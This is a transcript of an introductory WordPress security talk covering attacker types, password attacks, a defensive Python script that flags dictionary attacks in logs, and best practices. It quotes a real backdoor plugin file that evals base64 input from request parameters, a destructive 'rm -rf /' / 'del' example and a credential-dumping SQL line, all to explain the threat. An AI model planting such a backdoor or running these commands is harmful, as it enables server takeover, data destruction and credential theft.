intro to wordpress security
DESCRIPTION
A brief overview of security concepts to give context to the threats facing WordPress users.
TRANSCRIPT
Intro to WordPress Security
Prepared for the Oklahoma City WordPress User Group by Chris Dodds
Chris Dodds
Owner & Principal Advisor at Focusfire IT Strategy & Consulting
Features: Ten+ years of experience across multiple industries and IT disciplines.
System Requirements: Food, water, & internet connectivity.
Certifications: CISSP, MCITP:SA, Security+, Network+
This talk is not about the top 5 WP security threats.
Let’s talk about Betty.
Betty’s Fancy Blog o’ Gnomes
Betty’s Fancy Server
Betty’s Fancy Audience
Betty’s Fancy Employer
It’s not about you, Betty.
The Players
Script kiddies
Hacktivists
Pro Criminals
Information Warriors
Enumeration
Access
Exploitation
Password Attacks
Exploit weak passwords
Dictionary based
Can be entirely automated
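The slide says dictionary attacks against the login form can be entirely automated; the defender's counterpart is to notice them in the web-server log. The following is an added example, not part of the original talk: it parses constructed Apache combined-format log lines (sample data made up for this example, using documentation IP ranges) and flags any client that racks up a burst of failed wp-login.php POSTs. It relies on WordPress behaviour, not on any plugin: a failed login re-renders the form with status 200, while a successful one redirects with 302.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines in Apache "combined" format (not from any real site).
# 203.0.113.7 hammers the form six times in five seconds; 192.0.2.9 is a
# human who mistypes once and then logs in (302).
LOG_LINES = """\
203.0.113.7 - - [10/Mar/2012:13:55:01 -0600] "GET /wp-login.php HTTP/1.1" 200 3801 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2012:13:55:02 -0600] "POST /wp-login.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2012:13:55:03 -0600] "POST /wp-login.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2012:13:55:03 -0600] "POST /wp-login.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2012:13:55:04 -0600] "POST /wp-login.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2012:13:55:05 -0600] "POST /wp-login.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2012:13:55:06 -0600] "POST /wp-login.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2012:13:56:40 -0600] "POST /wp-login.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2012:13:56:55 -0600] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2012:13:57:10 -0600] "GET /2012/03/gnomes/ HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
"""

# Fields we need from a combined-format line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one line into (ip, timestamp, method, path, status); None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Drop the "-0600" zone suffix; every line in one log shares it.
    stamp = datetime.strptime(m.group("ts").split()[0], "%d/%b/%Y:%H:%M:%S")
    return m.group("ip"), stamp, m.group("method"), m.group("path"), int(m.group("status"))


def failed_logins(lines):
    """Yield (ip, timestamp) for each login POST answered with the form again (status 200)."""
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, stamp, method, path, status = rec
        if method == "POST" and path.split("?", 1)[0].endswith("/wp-login.php") and status == 200:
            yield ip, stamp


def find_dictionary_attacks(lines, threshold=5, window=timedelta(minutes=5)):
    """Return {ip: total_failures} for every IP with >= threshold failures inside any window."""
    per_ip = defaultdict(list)
    for ip, stamp in failed_logins(lines):
        per_ip[ip].append(stamp)
    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start = 0
        for end, current in enumerate(stamps):
            # Slide the window start forward until it lies within `window` of `current`.
            while current - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged


if __name__ == "__main__":
    for ip, n in find_dictionary_attacks(LOG_LINES.splitlines()).items():
        print(f"{ip}: {n} failed wp-login.php POSTs, likely an automated dictionary attack")
```

The threshold and window are tuning knobs, not magic numbers: five failures in five minutes catches a scripted run while leaving room for a forgetful human. A per-IP count will not catch a dictionary attack spread across many source addresses, which is one reason the later slides also recommend strong passphrases rather than relying on rate limiting alone.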
ToolsPack Plugin
toolspack.php
<?php
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? EVAL( base64_decode( $_REQUEST[e] ) ) : exit;
?>
Source - http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html
This backdoor code allows the remote user to:
Execute commands on your server
$WINDIR ? `del /F/S/Q $WINDIR\*` : `rm -rf /`;
Execute commands against your WP database
SELECT login + '-' + password FROM users
More Likely...
Payload - keylogger, trojan, spyware, virus
“garden gnomes, free chaps, leather sale, cheap sex, porn, prescription drugs, coupons, free avon”
SEO Spam - links, keywords
Best Practices
Update! Update! Update!
Don’t use the “admin” user.
Use a unique passphrase.
Disable or delete un-used plugins.
Backup & test your backups.
These are all things your attacker will do once they control your site.
Recommended Plugins
Backup
BackWPup - open-source or BackupBuddy - commercial
Security
Better WP Security - open-source
Limit Login Attempts - open-source
Sucuri SiteCheck Scanner - http://sitecheck.sucuri.net/
Contact and Q&A
Chris Dodds
e-mail - [email protected]
@doddschris
web - chrisdodds.net